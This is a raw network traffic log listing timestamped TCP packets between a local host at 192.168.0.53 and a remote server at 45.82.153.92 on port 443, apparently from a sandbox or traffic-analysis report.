Aug 24, 2022 11:19:26.721163034 CEST	443	49336	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:26.721426010 CEST	49336	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:26.807440996 CEST	49336	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:26.807447910 CEST	443	49336	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:26.850090981 CEST	49336	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:26.850095987 CEST	443	49336	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:26.852931023 CEST	443	49336	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:26.853173971 CEST	49336	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:26.853177071 CEST	49336	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:26.853178978 CEST	49336	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:27.538007021 CEST	49336	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:27.580863953 CEST	49336	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:27.581026077 CEST	443	49336	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:27.581151962 CEST	49336	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:27.581161022 CEST	443	49336	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:27.581403971 CEST	49336	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:27.623377085 CEST	49336	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:27.664762974 CEST	443	49336	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:27.731215954 CEST	443	49336	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:27.731229067 CEST	443	49336	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:27.731293917 CEST	443	49336	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:27.731364965 CEST	49336	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:27.731507063 CEST	49336	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:27.731509924 CEST	49336	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:27.731513023 CEST	49336	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:27.731514931 CEST	49336	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:27.731520891 CEST	49336	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:27.731651068 CEST	49336	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:28.136320114 CEST	49336	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:28.178858995 CEST	49336	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:28.178885937 CEST	443	49336	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:29.784996986 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:29.785077095 CEST	443	49337	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:29.785336018 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.021034002 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.021075010 CEST	443	49337	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:30.130692959 CEST	443	49337	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:30.130826950 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.134454966 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.134475946 CEST	443	49337	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:30.136358976 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.136373997 CEST	443	49337	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:30.137950897 CEST	443	49337	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:30.138215065 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.138225079 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.138227940 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.162839890 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.164263964 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.164397955 CEST	443	49337	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:30.164617062 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.164627075 CEST	443	49337	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:30.164844036 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.165555000 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.208791971 CEST	443	49337	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:30.331988096 CEST	443	49337	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:30.332024097 CEST	443	49337	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:30.332150936 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.332165003 CEST	443	49337	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:30.332377911 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.332389116 CEST	443	49337	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:30.332396030 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.332400084 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.332403898 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.332406998 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.332503080 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.332506895 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.332510948 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.332514048 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.332629919 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.335273027 CEST	443	49337	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:30.335298061 CEST	443	49337	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:30.335400105 CEST	443	49337	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:30.335586071 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.335697889 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.335705042 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.335709095 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.335711956 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.335716009 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.471534967 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.472948074 CEST	49337	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:30.472978115 CEST	443	49337	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:32.626176119 CEST	49338	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:32.626243114 CEST	443	49338	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:32.626570940 CEST	49338	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:33.540668964 CEST	49339	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:33.540718079 CEST	443	49339	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:33.540904999 CEST	49339	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:33.665992975 CEST	49339	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:33.666016102 CEST	443	49339	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:33.775430918 CEST	443	49339	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:33.775661945 CEST	49339	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:33.779989004 CEST	49339	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:33.779999018 CEST	443	49339	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:33.781939030 CEST	49339	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:33.781948090 CEST	443	49339	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:33.784832954 CEST	443	49339	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:33.785135984 CEST	49339	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:33.785142899 CEST	49339	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:33.785147905 CEST	49339	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:33.807440042 CEST	49339	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:33.808932066 CEST	49339	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:33.809123993 CEST	443	49339	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:33.809354067 CEST	49339	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:33.809365988 CEST	443	49339	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:33.809495926 CEST	49339	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:33.810578108 CEST	49339	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:33.852813959 CEST	443	49339	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:33.889188051 CEST	49338	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:33.889231920 CEST	443	49338	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:33.922329903 CEST	443	49339	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:33.922429085 CEST	443	49339	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:33.922467947 CEST	49339	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:33.922621012 CEST	49339	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:33.932409048 CEST	49339	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:33.932441950 CEST	443	49339	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:33.997822046 CEST	443	49338	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:33.997962952 CEST	49338	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:34.084660053 CEST	49338	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:34.084700108 CEST	443	49338	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:34.128773928 CEST	49338	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:34.128806114 CEST	443	49338	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:34.131628036 CEST	443	49338	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:34.131839991 CEST	49338	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:34.131855965 CEST	49338	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:34.131861925 CEST	49338	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:35.027683020 CEST	49338	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:35.104302883 CEST	49338	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:35.104582071 CEST	443	49338	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:35.104846001 CEST	49338	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:35.104867935 CEST	443	49338	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:35.105045080 CEST	49338	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:35.155013084 CEST	49338	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:35.196774960 CEST	443	49338	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:35.261337042 CEST	443	49338	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:35.261410952 CEST	443	49338	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:35.261581898 CEST	49338	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:35.261595011 CEST	49338	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:35.742506027 CEST	49338	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:35.742533922 CEST	443	49338	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:36.088401079 CEST	49340	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:36.088469982 CEST	443	49340	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:36.088676929 CEST	49340	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:36.310353994 CEST	49340	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:36.310396910 CEST	443	49340	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:36.420814037 CEST	443	49340	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:36.421097040 CEST	49340	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:36.427187920 CEST	49340	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:36.427201986 CEST	443	49340	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:36.429805040 CEST	49340	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:36.429819107 CEST	443	49340	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:36.431052923 CEST	443	49340	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:36.431260109 CEST	49340	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:36.431266069 CEST	49340	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:36.431268930 CEST	49340	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:36.476591110 CEST	49340	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:36.479173899 CEST	49340	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:36.479440928 CEST	443	49340	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:36.479604006 CEST	49340	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:36.479625940 CEST	443	49340	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:36.479801893 CEST	49340	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:36.481795073 CEST	49340	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:36.524761915 CEST	443	49340	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:36.571950912 CEST	443	49340	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:36.572072029 CEST	443	49340	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:36.572231054 CEST	49340	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:36.572331905 CEST	49340	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:36.589926004 CEST	49340	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:36.589971066 CEST	443	49340	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:36.836433887 CEST	49341	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:36.836493015 CEST	443	49341	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:36.836714029 CEST	49341	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:37.072671890 CEST	49341	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:37.072709084 CEST	443	49341	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:37.176899910 CEST	443	49341	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:37.177109003 CEST	49341	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:37.183121920 CEST	49341	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:37.183139086 CEST	443	49341	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:37.185606003 CEST	49341	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:37.185617924 CEST	443	49341	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:37.188225031 CEST	443	49341	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:37.188460112 CEST	49341	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:37.188472986 CEST	49341	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:37.188569069 CEST	49341	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:37.232543945 CEST	49341	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:37.235210896 CEST	49341	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:37.235510111 CEST	443	49341	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:37.235718966 CEST	49341	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:37.235733986 CEST	443	49341	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:37.235925913 CEST	49341	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:37.237674952 CEST	49341	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:37.262275934 CEST	49341	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:37.262408972 CEST	443	49341	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:37.320998907 CEST	443	49341	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:37.321120024 CEST	443	49341	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:37.321197987 CEST	49341	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:37.321326017 CEST	49341	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:37.338771105 CEST	49341	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:37.338815928 CEST	443	49341	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:37.631550074 CEST	49342	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:37.631588936 CEST	443	49342	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:37.631812096 CEST	49342	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:37.871253014 CEST	49342	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:37.871299028 CEST	443	49342	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:37.991559029 CEST	443	49342	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:37.991799116 CEST	49342	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:37.998533964 CEST	49342	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:37.998548985 CEST	443	49342	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:38.001610994 CEST	49342	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:38.001624107 CEST	443	49342	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:38.005069971 CEST	443	49342	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:38.005383015 CEST	49342	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:38.005388021 CEST	49342	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:38.005392075 CEST	49342	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:38.048639059 CEST	49342	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:38.051018000 CEST	49342	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:38.051184893 CEST	443	49342	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:38.051413059 CEST	49342	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:38.051425934 CEST	443	49342	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:38.051553011 CEST	49342	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:38.053752899 CEST	49342	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:38.096765995 CEST	443	49342	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:38.138427019 CEST	443	49342	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:38.138545036 CEST	443	49342	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:38.138637066 CEST	49342	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:38.138746023 CEST	49342	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:38.156796932 CEST	49342	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:38.156842947 CEST	443	49342	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:40.080882072 CEST	49343	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:40.080925941 CEST	443	49343	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:40.081129074 CEST	49343	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:40.256680965 CEST	49343	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:40.256701946 CEST	443	49343	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:40.365648031 CEST	443	49343	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:40.365829945 CEST	49343	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:40.369422913 CEST	49343	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:40.369450092 CEST	443	49343	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:40.371392965 CEST	49343	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:40.371419907 CEST	443	49343	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:40.374247074 CEST	443	49343	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:40.374592066 CEST	49343	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:40.374605894 CEST	49343	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:40.374612093 CEST	49343	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:40.397238970 CEST	49343	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:40.398757935 CEST	49343	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:40.398981094 CEST	443	49343	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:40.399203062 CEST	49343	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:40.399224997 CEST	443	49343	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:40.399466991 CEST	49343	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:40.400260925 CEST	49343	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:40.440762043 CEST	443	49343	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:40.515737057 CEST	443	49343	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:40.515778065 CEST	443	49343	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:40.515877008 CEST	49343	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:40.515896082 CEST	443	49343	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:40.516107082 CEST	49343	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:40.516113997 CEST	49343	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:40.516119003 CEST	49343	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:40.516124010 CEST	49343	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:40.516488075 CEST	443	49343	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:40.516563892 CEST	443	49343	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:40.516614914 CEST	49343	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:40.516712904 CEST	49343	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:40.523833036 CEST	49343	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:40.525362968 CEST	49343	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:40.525398970 CEST	443	49343	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:41.864914894 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:41.864975929 CEST	443	49344	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:41.865103960 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:41.989394903 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:41.989433050 CEST	443	49344	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:42.097357988 CEST	443	49344	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:42.097492933 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.101398945 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.101425886 CEST	443	49344	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:42.103446960 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.103473902 CEST	443	49344	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:42.106242895 CEST	443	49344	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:42.106592894 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.106606960 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.106614113 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.130187035 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.131562948 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.131791115 CEST	443	49344	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:42.132052898 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.132074118 CEST	443	49344	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:42.132282972 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.133030891 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.176762104 CEST	443	49344	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:42.300196886 CEST	443	49344	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:42.300231934 CEST	443	49344	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:42.300297976 CEST	443	49344	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:42.300355911 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.300463915 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.300474882 CEST	443	49344	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:42.300479889 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.300484896 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.300488949 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.300492048 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.300497055 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.300501108 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.300590038 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.300833941 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.300844908 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.301408052 CEST	443	49344	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:42.301506996 CEST	443	49344	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:42.301793098 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.301804066 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.301809072 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.301881075 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.301884890 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.301889896 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.444010019 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.445534945 CEST	49344	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:42.445565939 CEST	443	49344	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:44.660146952 CEST	49345	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:44.660192013 CEST	443	49345	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:44.660434961 CEST	49345	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:45.581823111 CEST	49346	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:45.581866026 CEST	443	49346	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:45.582078934 CEST	49346	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:45.707470894 CEST	49346	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:45.707489967 CEST	443	49346	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:45.817758083 CEST	443	49346	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:45.818017006 CEST	49346	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:45.822561026 CEST	49346	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:45.822570086 CEST	443	49346	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:45.824702978 CEST	49346	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:45.824712038 CEST	443	49346	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:45.827579975 CEST	443	49346	45.82.153.92	192.168.0.53
Aug 24, 2022 11:19:45.827769041 CEST	49346	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:45.827879906 CEST	49346	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:45.827888012 CEST	49346	443	192.168.0.53	45.82.153.92
Aug 24, 2022 11:19:45.850910902 CEST	49346	443	192.168.0.53	45.82.153.92
